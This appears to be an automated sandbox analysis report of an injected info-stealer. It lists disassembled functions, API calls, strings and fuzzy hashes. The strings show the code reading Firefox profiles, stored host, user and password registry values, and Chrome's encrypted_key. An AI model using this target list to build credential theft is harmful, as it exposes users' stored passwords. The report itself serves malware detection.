Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

Part of subcall function 000C1D32: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
Part of subcall function 000C1D32: CloseHandle.KERNEL32(00000000), ref: 000C1D57

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 000C2E83
StrStrIW.SHLWAPI(00000000,Profile), ref: 000C2EB5
GetPrivateProfileStringW.KERNEL32(00000000,Path,00116388,?,00000FFF,?), ref: 000C2ED8
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 000C2EEB
lstrlenW.KERNEL32(00000000), ref: 000C2F48

Strings

Path, xrefs: 000C2ED2
profiles.ini, xrefs: 000C2E3D
IsRelative, xrefs: 000C2EE5
Profile, xrefs: 000C2EAF

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 004f6c4d4dee7e5d7340ad7d0db7a497e2f6cc1eebcbe3c8d56cfdf09492295a
Instruction ID: a77e69fdefaefed72305b50384a1ff82e138d883e56c876c3e9f5d49b8f759a0
Opcode Fuzzy Hash: 004f6c4d4dee7e5d7340ad7d0db7a497e2f6cc1eebcbe3c8d56cfdf09492295a
Instruction Fuzzy Hash: 37319C30704305ABC755AB209951FAF76F2AFCA700F20443DF806A7693DBB69C879B52

Uniqueness

Uniqueness Score: -1.00%

Function 000C46BF Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000C1BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1BE6
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C04
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C3D
Part of subcall function 000C1BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1C60

Part of subcall function 000C463A: lstrlenW.KERNEL32(?), ref: 000C4653
Part of subcall function 000C463A: lstrlenW.KERNEL32(?), ref: 000C469D
Part of subcall function 000C463A: lstrlenW.KERNEL32(?), ref: 000C46A5

wsprintfW.USER32 ref: 000C47B5
wsprintfW.USER32 ref: 000C47C7

Strings

%s:%u, xrefs: 000C477F, 000C47C5
%s:%u/%s, xrefs: 000C4790, 000C47B3
Password, xrefs: 000C46F2
HostName, xrefs: 000C46D2
RemoteDirectory, xrefs: 000C4706
UserName, xrefs: 000C46E0

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: 2242c37d84fc6cfc48da34f15b05f9959148f984e6574f7e3be636912b6029c0
Instruction ID: 86b51aee63b52163e000f2b2d8618361ba7fa82ab70bb5453b5a97570247f225
Opcode Fuzzy Hash: 2242c37d84fc6cfc48da34f15b05f9959148f984e6574f7e3be636912b6029c0
Instruction Fuzzy Hash: E331D631B083546BD714ABA5CC60EAFB6EDFFCB744B05462DB04597282DBB2DC4287A1

Uniqueness

Uniqueness Score: -1.00%

Function 000CF73D Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 000CF940
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CF95B
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CF96E
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 000CF9A3

Strings

-journal, xrefs: 000CF979
immutable, xrefs: 000CFA76
-wal, xrefs: 000CF9B7
nolock, xrefs: 000CFA5C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: e55ddb1f0ae66759381ab468548c169a79914a9b3469664218ab98104117bb15
Instruction ID: 569622016ce5df27a8b5e88bfe02f0dc961ca42db4014b99d115f5cec972150d
Opcode Fuzzy Hash: e55ddb1f0ae66759381ab468548c169a79914a9b3469664218ab98104117bb15
Instruction Fuzzy Hash: 27D1C3B16083419FC714DF24C891B6EBBE2AF95314F18897DF8998B382DB75D805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000C762E Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133
%, xrefs: 000C7630

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: 7ac1c13dafb5ea13d98511ecc787a05a4d1a43b3c2982bab81a41a0704c29803
Instruction ID: 5310fb414573cac9557a2a895f791b42abcecd23dbf48d71aae4f8abde11a00d
Opcode Fuzzy Hash: 7ac1c13dafb5ea13d98511ecc787a05a4d1a43b3c2982bab81a41a0704c29803
Instruction Fuzzy Hash: 5BD1F734A0C3818BD7758B28C490B7FBBE5AF95304F28496EF9C687352D675C945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000C76BE Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: d2e157b8c259a9e4a8bdb9161664b22aa986daa9c2a3fc405eee265c60e431a8
Instruction ID: aa50541073e47531839a5a48a4e3a8af6605c23ebfd3d32078fe7a9d3008c978
Opcode Fuzzy Hash: d2e157b8c259a9e4a8bdb9161664b22aa986daa9c2a3fc405eee265c60e431a8
Instruction Fuzzy Hash: 0FE10634A0C3828BD7758B28C450B7EBBE1AF95304F28496EF8CA97352D675CD45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C786A Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: ef1ce595a51ca925c05a706056e61ee9092f5916f6cdbac725ab2f6a3490ff6a
Instruction ID: 0d4f8e068a8650c278ffcde0ba354d3d143a4cf881db3e8526ddc0ed26932d78
Opcode Fuzzy Hash: ef1ce595a51ca925c05a706056e61ee9092f5916f6cdbac725ab2f6a3490ff6a
Instruction Fuzzy Hash: A5E1E334A0C3818BD7758B28C490B7EBBE1AF95304F28496EF8CA97352D676CD45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000C7836 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: cef74a7aae0056b568f3799c5d1016007e7b82134650098d023d5d20907ad07e
Instruction ID: bccb756cde53742cfe68b212ede2cb0954a45e80a566538a7cfed11c0ec68d83
Opcode Fuzzy Hash: cef74a7aae0056b568f3799c5d1016007e7b82134650098d023d5d20907ad07e
Instruction Fuzzy Hash: CDE1F574A0C3828BD7758F28C490B7EBBE1AF95304F28496EF8C987352D671C985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000C7607 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 73e3f353ad1973a875ce766a775e64079f6c2712e1c6007ea0a27109840990c3
Instruction ID: 2bc09cf03836ff9d503dd855ea0ffecc1c75792170258ad229ba63035638c727
Opcode Fuzzy Hash: 73e3f353ad1973a875ce766a775e64079f6c2712e1c6007ea0a27109840990c3
Instruction Fuzzy Hash: 89E1F574A0C3828BD7758F28C490B7EBBE1AF95304F28496EF8C687352D675C945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C6ED7 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 000C701C
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 000C7034
_aulldvrm.NTDLL(00000000,00000000,?), ref: 000C7089

Strings

NaN, xrefs: 000C7206
-x0, xrefs: 000C7133

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: da844a51e7d61680bab4b73cfc0d43393085a0fceea74efe53f310146e9bdaca
Instruction ID: ab4dbe253d4a25afcb21de2c0abac5e27aed0682dc5d956c8ed56edb47730bac
Opcode Fuzzy Hash: da844a51e7d61680bab4b73cfc0d43393085a0fceea74efe53f310146e9bdaca
Instruction Fuzzy Hash: 12D1F774A0C3828BD7758F28C490B7EBBE5AF95304F28496EF8C687352D676C945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000C879D Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 000C88BB
_allmul.NTDLL(?,?,0000000A,00000000), ref: 000C8974
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 000C8AA9
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 000C8ABC

Strings

., xrefs: 000C8925

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: aee76dbea925ad16ec44929e64cc7c74a47a73b3295d7d8d53f70583472e802d
Instruction ID: e37259702ba219ba468fff60a9f02b7f2374e052afe811217c22d0a08737da50
Opcode Fuzzy Hash: aee76dbea925ad16ec44929e64cc7c74a47a73b3295d7d8d53f70583472e802d
Instruction Fuzzy Hash: 42D1F2B190C7858BD724DF488884B7EBBE0FBD5314F048D5EF5C942291DBB1C9458B8A

Uniqueness

Uniqueness Score: -1.00%

Function 000ED492 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 000ED4AE
memset.NTDLL ref: 000ED4C1
memset.NTDLL ref: 000ED4D1

Strings

,, xrefs: 000ED50A
9, xrefs: 000ED50F
7, xrefs: 000ED529

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 70c0dbcb8a4377040fc7a7adef815137ca1af43534a8e929eef84b3b62ce824f
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: E6316B71508384DFD764DF60D440BCFBBE8AFC4344F00492EB98997252EB71A649CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000C1D8D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,000C2FE5,PathToExe,00000000,00000000), ref: 000C1D94
StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1DB8
StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1DCD
lstrlenW.KERNEL32(00000000,?,000C2FE5,PathToExe,00000000,00000000), ref: 000C1DE4

Strings

.exe, xrefs: 000C1DB2

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: 29920013c847bbbbf436578ef23acb1030a46adf7234194c91f7240d4db4f386
Instruction ID: 0abd02741d8851bdc1404029f4ef3c1128c60ae1c773380794b1f28dcd29d744
Opcode Fuzzy Hash: 29920013c847bbbbf436578ef23acb1030a46adf7234194c91f7240d4db4f386
Instruction Fuzzy Hash: 0CF0C231311210AAD3A86F74AD84FFE22E5EF06341720882DF143C3162EB618D81C759

Uniqueness

Uniqueness Score: -1.00%

Function 000D2E04 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 000D2F7D
_allmul.NTDLL(-00000001,00000000,?,?), ref: 000D2FE0
_alldiv.NTDLL(?,?,00000000), ref: 000D30EC
_allmul.NTDLL(00000000,?,00000000), ref: 000D30F5
_allmul.NTDLL(?,00000000,?,?), ref: 000D31A0

Part of subcall function 000D14DB: memset.NTDLL ref: 000D1539

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 7ef47fc668faa9e6e06c1daf7cac206b2d749bdd159507beec1f408dca66eefd
Instruction ID: 5409442e8ea708a2deab6e28500729cd67c582a4a9b3d7c557c26273cc6e01af
Opcode Fuzzy Hash: 7ef47fc668faa9e6e06c1daf7cac206b2d749bdd159507beec1f408dca66eefd
Instruction Fuzzy Hash: 99D18A71A083019BCB64DF69C880BAEBBE1AFD8300F14492EF99593352D770DE45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000F8608 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

new, xrefs: 000F86B8
FOREIGN KEY constraint failed, xrefs: 000F88D6
old, xrefs: 000F86AC

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: 858434da2980a05b437144acc6e7e1d666f7a63a5bdf2cadb7691ad43af26bc1
Instruction ID: 4c7330b6434cc991888cf1bcf0b149765167b980c9195f21d3937e597e7ef3b9
Opcode Fuzzy Hash: 858434da2980a05b437144acc6e7e1d666f7a63a5bdf2cadb7691ad43af26bc1
Instruction Fuzzy Hash: 6BD138707083449FD714DF25C881BBFBBE5AB88750F10881EFA859B292DB74E941DB52

Uniqueness

Uniqueness Score: -1.00%

Function 000C94CA Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000C94F5
_alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9515
_alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9547
_alldiv.NTDLL(00000001,80000000,?,?), ref: 000C957A
_allmul.NTDLL(?,?,?,?), ref: 000C95A6

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: 97dfc073b1665f99dfeb2b41876dcd2bae1185b92df318f30991af3e88d5cb3d
Instruction ID: 5f4a196d7a3cbb423a64366540ffca852a61ce737810e6948fdfc51228b42aa5
Opcode Fuzzy Hash: 97dfc073b1665f99dfeb2b41876dcd2bae1185b92df318f30991af3e88d5cb3d
Instruction Fuzzy Hash: 80212872108F4156D77A5B198C8EF7F76C9DBD13A0F24022DFC1297252FA118C404365

Uniqueness

Uniqueness Score: -1.00%

Function 000DAF70 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 000DAFC1
_alldvrm.NTDLL(?,?,00000000), ref: 000DB01D
_allrem.NTDLL(?,00000000,?,?), ref: 000DB098
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 000DB0A6

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
Instruction ID: 5e5fa4a27c705d4d4e54f30b4ed5453be244efd3894e9f6e132514a84f9cf825
Opcode Fuzzy Hash: 8e40c15e4f4af4a80cefe73363758988e16c4c325756f2a9d9c4a273f9e8da1e
Instruction Fuzzy Hash: CC4128756083019FC754EF25C890A6BBBE6AFD8340F05492EF99987352DB31EC45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000C1BAD Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1BE6
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C04
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C3D
RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1C60

Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA), ref: 000C1020
Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 7b931ce13fe8a02b30f3c2c8554ed581b06078b1f04c4610636f8e8a2f96fac2
Instruction ID: b73330cb99a02a40d83a0c4fd6e8b694d601de3ef12ecac9102b3c56072c51de
Opcode Fuzzy Hash: 7b931ce13fe8a02b30f3c2c8554ed581b06078b1f04c4610636f8e8a2f96fac2
Instruction Fuzzy Hash: D421C172244300AFE7288B21CC84FBFB7EDEFCA754F144A2DF89692142DA25DD449761

Uniqueness

Uniqueness Score: -1.00%

Function 000CA48A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(?,?,?), ref: 000CA4BB
_allmul.NTDLL(00000000,?,?), ref: 000CA4C4

Strings

winTruncate1, xrefs: 000CA4ED
winTruncate2, xrefs: 000CA525

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 727729158-470713972
Opcode ID: ace1a8e3996c3e6587d30984c0e29c536af9b57d5ca0a09bfdac41eae705ae4b
Instruction ID: 0e09a1690a54011c8c6df70dfd5839eb83fa6c97d2f5fb8d8185072c561c8090
Opcode Fuzzy Hash: ace1a8e3996c3e6587d30984c0e29c536af9b57d5ca0a09bfdac41eae705ae4b
Instruction Fuzzy Hash: C221C172300204ABCB548F18CC85FAF37A9EB8A314F14816DFC14DB246DB30DC408B62

Uniqueness

Uniqueness Score: -1.00%

Function 000C1A5D Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 000C1A6F
GlobalFix.KERNEL32(000C4965), ref: 000C1A7E
GlobalUnWire.KERNEL32(?), ref: 000C1ABC

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C1AB0

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
String ID:
API String ID: 2207111602-0
Opcode ID: e67074feb7d63f8d32255adbe17465ca5efb91c59994cfd40e8983ac881ce33f
Instruction ID: 9bc16275ce995ba6311d61d10beb373b5828187185a2d94dc61830684e057ab2
Opcode Fuzzy Hash: e67074feb7d63f8d32255adbe17465ca5efb91c59994cfd40e8983ac881ce33f
Instruction Fuzzy Hash: 6701AD31605301AF8B059F259C18EDFBBE9AF86350B14C52EF80582222DF32C8449B61

Uniqueness

Uniqueness Score: -1.00%

Function 000C1B1B Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 1d1e23075910f39ff5d18232069d8835cb421f17440ab0cd73fec9f29a9b936b
Instruction ID: 42bb36f3784d6d30bef8d70335754a45527d030c97484f74144ae1847aba99a5
Opcode Fuzzy Hash: 1d1e23075910f39ff5d18232069d8835cb421f17440ab0cd73fec9f29a9b936b
Instruction Fuzzy Hash: 3AE0656270021C1B472477AE6C94EFB76DCCBD96A53060139FA04D3202FE66DC058AB0

Uniqueness

Uniqueness Score: -1.00%

Function 000C3121 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C3131
lstrlen.KERNEL32("encrypted_key":",?,000C3DB6), ref: 000C313E
StrStrIA.SHLWAPI("encrypted_key":",0011693C), ref: 000C314D

Part of subcall function 000C1AD3: lstrlen.KERNEL32(?,?,?,?,00000000,000C28F3), ref: 000C1AF3
Part of subcall function 000C1AD3: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C28F3), ref: 000C1AF8
Part of subcall function 000C1AD3: lstrcat.KERNEL32(00000000,?), ref: 000C1B0E
Part of subcall function 000C1AD3: lstrcat.KERNEL32(00000000,00000000), ref: 000C1B12

Strings

"encrypted_key":", xrefs: 000C312A, 000C312F, 000C313D, 000C314C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: 5b8d2ebbb128617cb58976ee79e4489bc03db6bb092f3b61a071b0bdb49463a2
Instruction ID: d541e858ad3bee87a39d873951528999fed01626e48d0a89bdd70bb7982a802a
Opcode Fuzzy Hash: 5b8d2ebbb128617cb58976ee79e4489bc03db6bb092f3b61a071b0bdb49463a2
Instruction Fuzzy Hash: BBE09B6260AB646F93656BFA2C44DCB7A68DF466143098078F90197513DF978941C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 000EF02A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 000C688F: memset.NTDLL ref: 000C68AA

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 000EF0AF

Strings

%llu, xrefs: 000EF0B6
%llu, xrefs: 000EF06C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: eabc609ea280b0f5e7fd75db152eb7df4e2fcc205a7e069ce7a0f2a605a672f5
Instruction ID: 53904a5843b336d0ce76b17f56658057bc8ae2f74f259a7c53c1885acfaafd2d
Opcode Fuzzy Hash: eabc609ea280b0f5e7fd75db152eb7df4e2fcc205a7e069ce7a0f2a605a672f5
Instruction Fuzzy Hash: BD2108716406166BC710AB648C42FBF77A9EF80770F05863DF826A72C2EB609C1587F2

Uniqueness

Uniqueness Score: -1.00%

Function 000C1E67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,000C2D97), ref: 000C1E72
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1E7D

Strings

,., xrefs: 000C1E83, 000C1EA0, 000C1EA6

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: ComputeCrc32lstrlen
String ID: ,.
API String ID: 3131422382-30864125
Opcode ID: 34461194795adbfcc09e41b4deeda39655a863ec80ce64648b5632a4db7bec40
Instruction ID: 5a6a5967604a9034b505e39f9b578e96d72f595f1b7500a8bbd99ec5925bcbeb
Opcode Fuzzy Hash: 34461194795adbfcc09e41b4deeda39655a863ec80ce64648b5632a4db7bec40
Instruction Fuzzy Hash: 13F05E31205220ABC3398F18A904FFEBBA9AB96B90316421DEC05C7666DB719C42CA94

Uniqueness

Uniqueness Score: -1.00%

Function 000D1E4A Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 000D1F82
